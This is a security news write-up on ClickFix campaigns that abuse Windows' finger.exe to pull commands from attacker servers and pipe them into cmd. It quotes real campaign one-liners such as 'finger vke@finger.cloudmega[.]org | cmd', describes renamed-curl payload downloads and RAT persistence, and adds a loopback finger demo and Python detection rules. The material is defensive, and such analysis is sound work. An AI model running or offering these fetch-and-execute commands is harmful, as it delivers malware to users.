Decades-old ‘Finger’ protocol abused in ClickFix malware attacks
Threat actors are abusing the decades-old "finger" command to execute malicious commands on Windows devices, reviving a previously known LOLBIN technique. The Finger protocol was once commonly used to look up user information on Unix systems, and Windows still ships a finger.exe client in System32. ClickFix attacks now use that built-in client to retrieve command lines from an attacker-controlled server and execute them locally.
Last month, a researcher discovered a batch file employing the command finger root@finger.nateams[.]com to fetch commands from a remote server and execute them locally. While that specific host is no longer active, further investigation revealed similar campaigns utilizing the finger command. In one instance, a Reddit user reported falling victim to a ClickFix attack disguised as a Captcha verification, which prompted them to run a Windows command that executed finger vke@finger.cloudmega[.]org and piped the output into cmd.exe. This triggered the download of a fake PDF containing a malicious Python package, which then called back to the attacker's server.
Another campaign utilizes finger Kove2@api.metrics-strange.com | cmd to execute similar commands. This variant adds a reconnaissance phase that checks for common malware analysis tools such as filemon, regmon, procexp, tcpview and Wireshark, and for debuggers such as OllyDbg. If any of these is detected, the script terminates, most likely to evade analysis. If none is found, it downloads a ZIP archive masquerading as a PDF which, instead of the Python malware, contains the NetSupport Manager RAT package; the script extracts it and configures a scheduled task to launch it at user login, giving the attacker persistent remote access.
These attacks turn the Finger protocol into a remote script delivery channel: the client sends the requested user name to TCP port 79 and the server may answer with any text it likes, so an attacker-controlled host simply returns command lines, which the trailing | cmd then executes. The retrieved commands create randomly named directories, copy the built-in curl.exe there under a different name, and use that renamed copy to download ZIP archives disguised as PDFs; the payloads inside are then extracted and executed.
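To show why a finger query is a usable delivery channel, the following Python script, added here as an illustration and not part of the Bleeping Computer article or of the attackers' tooling, performs the RFC 1288 exchange that finger.exe performs for "finger user@host": it opens a TCP connection, sends the user name followed by CRLF, and reads whatever text the server returns until the connection closes. The server side is a throwaway loopback listener on an ephemeral port (real finger servers listen on TCP 79), and the reply text is constructed and harmless; nothing here executes it.

```python
import socket
import socketserver
import threading

# Constructed, harmless text the demo server hands back. In the campaigns
# described above the server returns Windows command lines instead; whatever
# comes back is exactly what "finger user@host | cmd" would run.
DEMO_RESPONSE = "echo this text came from the finger server\r\n"


class FingerHandler(socketserver.StreamRequestHandler):
    """Minimal RFC 1288 server: read one query line, reply with free text, close."""

    def handle(self):
        query = self.rfile.readline(512)   # the query is one CRLF-terminated line
        self.server.last_query = query     # recorded so the demo can show what arrived
        self.wfile.write(DEMO_RESPONSE.encode())
        # connection is closed by socketserver after handle() returns -> client sees EOF


class DemoFingerServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True
    last_query = b""


def start_demo_server(host="127.0.0.1", port=0):
    """Bind on an ephemeral loopback port (not 79) and serve in a background thread."""
    server = DemoFingerServer((host, port), FingerHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def finger_query(host, port, user, timeout=5.0):
    """What finger.exe does for 'finger user@host': send 'user\\r\\n', return the raw reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"{user}\r\n".encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:            # server closed the connection: end of reply
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def demo():
    """Run one full exchange against the loopback server; returns (query sent, reply)."""
    server, port = start_demo_server()
    try:
        reply = finger_query("127.0.0.1", port, "root")
        return server.last_query, reply
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    sent, received = demo()
    print("client sent:   ", sent)
    print("server replied:", received.strip())
```

The point of the exchange is that the "user" is just an opaque string and the reply is unstructured text with no integrity or authenticity check, which is all the ClickFix lure needs once the victim appends "| cmd".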
The most effective defense is to block outbound traffic to TCP port 79, the standard Finger port, at both the host firewall and the network egress; few if any enterprise workflows depend on it. Because finger.exe ships with Windows, application control (AppLocker or WDAC) can also deny it outright, and process-creation telemetry should alert on finger.exe being launched with a user@host argument, particularly when its output is piped into cmd.exe, and on copies of curl.exe running under another name. While these attacks currently appear to be conducted by a single threat actor, the technique is easy to reuse, so vigilance is crucial. Security professionals should monitor for unusual network traffic and educate users about the risks of pasting and executing commands from untrusted sources.
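The detection side, as an added example that is not from the article: a small Python rule set run over constructed process-creation records laid out like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage, OriginalFileName). It flags a command line in which a remote finger query is piped into cmd.exe or PowerShell, a finger.exe launched from a shell with a user@host argument, and a binary whose OriginalFileName is curl.exe but which runs under another name, which is the renamed-curl step described above. The hostnames and paths in the sample records are placeholders, not indicators from the campaigns.

```python
import ntpath
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# They are sample input for this example, not logs from the campaigns above;
# "example.invalid" and the paths are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c finger vke@finger.example.invalid | cmd",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "Cmd.Exe"},
    {"Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger vke@finger.example.invalid",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "finger.exe"},
    {"Image": r"C:\Users\Public\x7f3\svc.exe",
     "CommandLine": r"C:\Users\Public\x7f3\svc.exe -s -o report.pdf.zip https://example.invalid/a",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "curl.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "NOTEPAD.EXE"},
]

# "finger <something>@<something>": a query against a remote host.
FINGER_REMOTE = re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+", re.I)
# "| cmd", "| C:\...\cmd.exe", "| powershell" etc.: output handed to a shell.
PIPED_TO_SHELL = re.compile(r"\|\s*(?:\S*\\)?(?:cmd|powershell|pwsh)(?:\.exe)?\b", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return (rule, severity) for one record, or None if nothing matched."""
    cl = event.get("CommandLine", "")
    image = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    original = event.get("OriginalFileName", "").lower()

    # Rule 1: the ClickFix one-liner itself, finger output piped straight into a shell.
    if FINGER_REMOTE.search(cl) and PIPED_TO_SHELL.search(cl):
        return ("finger_output_piped_to_shell", "high")
    # Rule 2: finger.exe spawned by a shell with a remote user@host argument.
    if image == "finger.exe" and "@" in cl and parent in SHELLS:
        return ("finger_remote_query_from_shell", "medium")
    # Rule 3: curl.exe copied and run under another name (relies on Sysmon's
    # OriginalFileName, which comes from the PE version resource).
    if original == "curl.exe" and image != "curl.exe":
        return ("renamed_curl_binary", "high")
    return None


def detect(events):
    """Run every record through classify(); returns (rule, severity, CommandLine) per hit."""
    hits = []
    for event in events:
        result = classify(event)
        if result:
            hits.append((result[0], result[1], event["CommandLine"]))
    return hits


if __name__ == "__main__":
    for rule, severity, command_line in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {command_line}")
```

Rule 1 is the one worth paging on; rule 2 will also fire on the rare legitimate finger use, which is why the page's advice to block port 79 outright is the simpler control. Rule 3 is independent of finger and catches the renamed-curl download step even if the initial lure changes.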
To read the complete article see: Bleeping Computer.